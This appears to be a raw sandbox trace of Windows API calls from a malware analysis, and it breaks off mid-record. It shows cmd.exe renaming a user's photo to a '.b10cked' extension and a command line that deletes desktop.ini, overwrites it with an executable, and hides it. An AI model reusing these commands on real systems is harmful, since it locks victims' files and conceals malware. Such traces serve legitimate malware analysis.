hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0143.547] _get_osfhandle (_FileHandle=1) returned 0x7 [0143.547] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0143.548] _get_osfhandle (_FileHandle=0) returned 0x3 [0143.548] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0143.548] _get_osfhandle (_FileHandle=0) returned 0x3 [0143.548] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0143.548] GetEnvironmentStringsW () returned 0x4b0150* [0143.548] FreeEnvironmentStringsW (penv=0x4b0150) returned 1 [0143.548] GetEnvironmentStringsW () returned 0x4b0150* [0143.549] FreeEnvironmentStringsW (penv=0x4b0150) returned 1 [0143.549] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2eec14 | out: phkResult=0x2eec14*=0x40) returned 0x0 [0143.549] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2eec1c, lpData=0x2eec20, lpcbData=0x2eec18*=0x1000 | out: lpType=0x2eec1c*=0x0, lpData=0x2eec20*=0x78, lpcbData=0x2eec18*=0x1000) returned 0x2 [0143.549] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2eec1c, lpData=0x2eec20, lpcbData=0x2eec18*=0x1000 | out: lpType=0x2eec1c*=0x4, lpData=0x2eec20*=0x1, lpcbData=0x2eec18*=0x4) returned 0x0 [0143.549] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2eec1c, lpData=0x2eec20, lpcbData=0x2eec18*=0x1000 | out: lpType=0x2eec1c*=0x0, lpData=0x2eec20*=0x1, lpcbData=0x2eec18*=0x1000) returned 0x2 [0143.549] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2eec1c, lpData=0x2eec20, lpcbData=0x2eec18*=0x1000 | out: lpType=0x2eec1c*=0x4, lpData=0x2eec20*=0x0, lpcbData=0x2eec18*=0x4) returned 0x0 [0143.549] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2eec1c, 
lpData=0x2eec20, lpcbData=0x2eec18*=0x1000 | out: lpType=0x2eec1c*=0x4, lpData=0x2eec20*=0x40, lpcbData=0x2eec18*=0x4) returned 0x0 [0143.549] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2eec1c, lpData=0x2eec20, lpcbData=0x2eec18*=0x1000 | out: lpType=0x2eec1c*=0x4, lpData=0x2eec20*=0x40, lpcbData=0x2eec18*=0x4) returned 0x0 [0143.549] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2eec1c, lpData=0x2eec20, lpcbData=0x2eec18*=0x1000 | out: lpType=0x2eec1c*=0x0, lpData=0x2eec20*=0x40, lpcbData=0x2eec18*=0x1000) returned 0x2 [0143.549] RegCloseKey (hKey=0x40) returned 0x0 [0143.549] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2eec14 | out: phkResult=0x2eec14*=0x40) returned 0x0 [0143.549] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2eec1c, lpData=0x2eec20, lpcbData=0x2eec18*=0x1000 | out: lpType=0x2eec1c*=0x0, lpData=0x2eec20*=0x40, lpcbData=0x2eec18*=0x1000) returned 0x2 [0143.549] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2eec1c, lpData=0x2eec20, lpcbData=0x2eec18*=0x1000 | out: lpType=0x2eec1c*=0x4, lpData=0x2eec20*=0x1, lpcbData=0x2eec18*=0x4) returned 0x0 [0143.549] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2eec1c, lpData=0x2eec20, lpcbData=0x2eec18*=0x1000 | out: lpType=0x2eec1c*=0x0, lpData=0x2eec20*=0x1, lpcbData=0x2eec18*=0x1000) returned 0x2 [0143.549] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2eec1c, lpData=0x2eec20, lpcbData=0x2eec18*=0x1000 | out: lpType=0x2eec1c*=0x4, lpData=0x2eec20*=0x0, lpcbData=0x2eec18*=0x4) returned 0x0 [0143.549] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2eec1c, lpData=0x2eec20, lpcbData=0x2eec18*=0x1000 | out: lpType=0x2eec1c*=0x4, 
lpData=0x2eec20*=0x9, lpcbData=0x2eec18*=0x4) returned 0x0 [0143.549] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2eec1c, lpData=0x2eec20, lpcbData=0x2eec18*=0x1000 | out: lpType=0x2eec1c*=0x4, lpData=0x2eec20*=0x9, lpcbData=0x2eec18*=0x4) returned 0x0 [0143.549] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2eec1c, lpData=0x2eec20, lpcbData=0x2eec18*=0x1000 | out: lpType=0x2eec1c*=0x0, lpData=0x2eec20*=0x9, lpcbData=0x2eec18*=0x1000) returned 0x2 [0143.549] RegCloseKey (hKey=0x40) returned 0x0 [0143.550] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886372 [0143.550] srand (_Seed=0x5b886372) [0143.550] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Pictures\\isdKb.jpg\" \"C:\\Users\\EEBsYm5\\Pictures\\isdKb.jpg.b10cked\"" [0143.550] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Pictures\\isdKb.jpg\" \"C:\\Users\\EEBsYm5\\Pictures\\isdKb.jpg.b10cked\"" [0143.550] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0143.550] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4b18b0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0143.550] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0143.550] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0143.550] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0143.550] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 
[0143.551] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0143.551] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0143.551] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0143.551] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0143.551] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0143.551] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0143.551] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0143.551] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0143.551] GetEnvironmentStringsW () returned 0x4b22a0* [0143.551] FreeEnvironmentStringsW (penv=0x4b22a0) returned 1 [0143.551] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0143.551] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0143.551] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0143.551] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0143.551] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0143.551] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0143.551] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0143.551] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0143.551] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0143.551] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0143.551] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2ef9e0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0143.551] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2ef9e0, lpFilePart=0x2ef9dc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2ef9dc*="Desktop") returned 0x18 [0143.551] GetFileAttributesW 
(lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0143.552] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2ef75c | out: lpFindFileData=0x2ef75c) returned 0x4affe0 [0143.552] FindClose (in: hFindFile=0x4affe0 | out: hFindFile=0x4affe0) returned 1 [0143.552] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2ef75c | out: lpFindFileData=0x2ef75c) returned 0x4affe0 [0143.552] FindClose (in: hFindFile=0x4affe0 | out: hFindFile=0x4affe0) returned 1 [0143.552] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2ef75c | out: lpFindFileData=0x2ef75c) returned 0x4affe0 [0143.552] FindClose (in: hFindFile=0x4affe0 | out: hFindFile=0x4affe0) returned 1 [0143.552] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0143.553] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0143.553] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0143.553] GetEnvironmentStringsW () returned 0x4b2ac0* [0143.553] FreeEnvironmentStringsW (penv=0x4b2ac0) returned 1 [0143.553] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0143.553] GetConsoleOutputCP () returned 0x1b5 [0143.554] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0143.554] GetUserDefaultLCID () returned 0x409 [0143.554] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0143.554] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2efb20, cchData=128 | out: lpLCData="0") returned 2 [0143.554] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2efb20, cchData=128 | out: lpLCData="0") returned 2 [0143.554] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, 
lpLCData=0x2efb20, cchData=128 | out: lpLCData="1") returned 2 [0143.554] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0143.554] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0143.554] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0143.554] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0143.554] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0143.555] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0143.555] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0143.555] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0143.555] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0143.555] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0143.555] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0143.556] GetConsoleTitleW (in: lpConsoleTitle=0x4a08c0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0143.556] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0143.556] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0143.556] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0143.556] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0143.557] _wcsicmp (_String1="move", _String2=")") returned 68 [0143.557] _wcsicmp (_String1="FOR", 
_String2="move") returned -7 [0143.557] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0143.557] _wcsicmp (_String1="IF", _String2="move") returned -4 [0143.557] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0143.557] _wcsicmp (_String1="REM", _String2="move") returned 5 [0143.557] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0143.576] GetConsoleTitleW (in: lpConsoleTitle=0x2ef818, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0143.576] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0143.576] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0143.576] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0143.576] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0143.576] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0143.576] _wcsicmp (_String1="move", _String2="CD") returned 10 [0143.576] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0143.576] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0143.576] _wcsicmp (_String1="move", _String2="REN") returned -5 [0143.576] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0143.576] _wcsicmp (_String1="move", _String2="SET") returned -6 [0143.576] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0143.576] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0143.576] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0143.577] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0143.577] _wcsicmp (_String1="move", _String2="MD") returned 11 [0143.577] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0143.577] _wcsicmp (_String1="move", _String2="RD") returned -5 [0143.577] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0143.577] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0143.577] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0143.577] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0143.577] _wcsicmp 
(_String1="move", _String2="CLS") returned 10 [0143.577] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0143.577] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0143.577] _wcsicmp (_String1="move", _String2="VER") returned -9 [0143.577] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0143.577] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0143.577] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0143.577] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0143.577] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0143.577] _wcsicmp (_String1="move", _String2="START") returned -6 [0143.577] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0143.577] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0143.577] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0143.578] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0143.578] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0143.578] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2ef5d4, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x2ef5cc, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2ef5cc*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0143.579] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0143.579] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0143.579] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0143.579] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0143.579] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0143.579] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0143.579] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", 
_MaxCount=0x7) returned -3 [0143.579] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0143.579] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0143.579] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0143.579] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0143.579] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0143.579] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0143.579] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0143.579] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0143.579] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0143.579] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0143.579] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0143.579] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0143.580] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0143.580] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0143.580] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0143.580] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0143.580] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0143.580] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0143.580] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0143.580] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0143.580] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0143.580] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned 
-18 [0143.580] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0143.580] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0143.580] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0143.580] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0143.580] _wcsicmp (_String1="isdKb.jpg", _String2=".") returned 59 [0143.580] _wcsicmp (_String1="isdKb.jpg", _String2="..") returned 59 [0143.580] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\isdKb.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\isdkb.jpg")) returned 0x20 [0143.581] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4b1d28 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0143.581] SetErrorMode (uMode=0x0) returned 0x0 [0143.581] SetErrorMode (uMode=0x1) returned 0x0 [0143.581] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\isdKb.jpg", nBufferLength=0x104, lpBuffer=0x2eef5c, lpFilePart=0x2eef44 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\isdKb.jpg", lpFilePart=0x2eef44*="isdKb.jpg") returned 0x23 [0143.581] SetErrorMode (uMode=0x0) returned 0x1 [0143.581] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures" (normalized: "c:\\users\\eebsym5\\pictures")) returned 0x13 [0143.581] _wcsicmp (_String1="isdKb.jpg", _String2=".") returned 59 [0143.581] _wcsicmp (_String1="isdKb.jpg", _String2="..") returned 59 [0143.581] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\isdKb.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\isdkb.jpg")) returned 0x20 [0143.581] SetErrorMode (uMode=0x0) returned 0x0 [0143.581] SetErrorMode (uMode=0x1) returned 0x0 [0143.581] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\isdKb.jpg", nBufferLength=0x104, lpBuffer=0x2ef3d8, lpFilePart=0x2ef170 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\isdKb.jpg", lpFilePart=0x2ef170*="isdKb.jpg") returned 0x23 [0143.581] SetErrorMode (uMode=0x0) 
returned 0x1 [0143.582] SetErrorMode (uMode=0x0) returned 0x0 [0143.582] SetErrorMode (uMode=0x1) returned 0x0 [0143.582] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\isdKb.jpg.b10cked", nBufferLength=0x104, lpBuffer=0x2ef5e0, lpFilePart=0x2ef170 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\isdKb.jpg.b10cked", lpFilePart=0x2ef170*="isdKb.jpg.b10cked") returned 0x2b [0143.582] SetErrorMode (uMode=0x0) returned 0x1 [0143.582] SetLastError (dwErrCode=0x0) [0143.582] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\isdKb.jpg.b10cked" (normalized: "c:\\users\\eebsym5\\pictures\\isdkb.jpg.b10cked")) returned 0xffffffff [0143.582] GetLastError () returned 0x2 [0143.582] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\isdKb.jpg", fInfoLevelId=0x1, lpFindFileData=0x2eeaec, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eeaec) returned 0x4b2198 [0143.582] FindNextFileW (in: hFindFile=0x4b2198, lpFindFileData=0x2eeaec | out: lpFindFileData=0x2eeaec) returned 0 [0143.583] GetLastError () returned 0x12 [0143.583] FindClose (in: hFindFile=0x4b2198 | out: hFindFile=0x4b2198) returned 1 [0143.583] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\isdKb.jpg", fInfoLevelId=0x1, lpFindFileData=0x4b1ac8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4b1ac8) returned 0x4b2198 [0143.583] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\isdKb.jpg.b10cked", nBufferLength=0x104, lpBuffer=0x2eed84, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\isdKb.jpg.b10cked", lpFilePart=0x0) returned 0x2b [0143.583] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\isdKb.jpg", nBufferLength=0x104, lpBuffer=0x2eed84, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\isdKb.jpg", lpFilePart=0x0) returned 0x23 [0143.583] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\isdKb.jpg" (normalized: 
"c:\\users\\eebsym5\\pictures\\isdkb.jpg")) returned 0x20 [0143.584] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\Pictures\\isdKb.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\isdkb.jpg"), lpNewFileName="C:\\Users\\EEBsYm5\\Pictures\\isdKb.jpg.b10cked" (normalized: "c:\\users\\eebsym5\\pictures\\isdkb.jpg.b10cked"), dwFlags=0x3) returned 1 [0143.584] FindClose (in: hFindFile=0x4b2198 | out: hFindFile=0x4b2198) returned 1 [0143.584] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x2eed38 | out: _Buffer=" 1") returned 9 [0143.584] _get_osfhandle (_FileHandle=1) returned 0x7 [0143.584] GetFileType (hFile=0x7) returned 0x2 [0143.872] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0143.872] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2eecc4 | out: lpMode=0x2eecc4) returned 1 [0143.872] _get_osfhandle (_FileHandle=1) returned 0x7 [0143.872] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2eecf8 | out: lpConsoleScreenBufferInfo=0x2eecf8) returned 1 [0143.873] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0143.873] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x2eed38 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0143.873] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x2eed1c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x2eed1c*=0x1a) returned 1 [0143.873] _get_osfhandle (_FileHandle=1) returned 0x7 [0143.873] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0143.873] _get_osfhandle (_FileHandle=1) returned 0x7 [0143.873] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0143.874] _get_osfhandle 
(_FileHandle=0) returned 0x3 [0143.874] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0143.874] SetConsoleInputExeNameW () returned 0x1 [0143.874] GetConsoleOutputCP () returned 0x1b5 [0143.874] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0143.874] SetThreadUILanguage (LangId=0x0) returned 0x409 [0143.874] exit (_Code=0) Process: id = "187" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16ee0" os_pid = "0xfdc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\"" cur_dir = 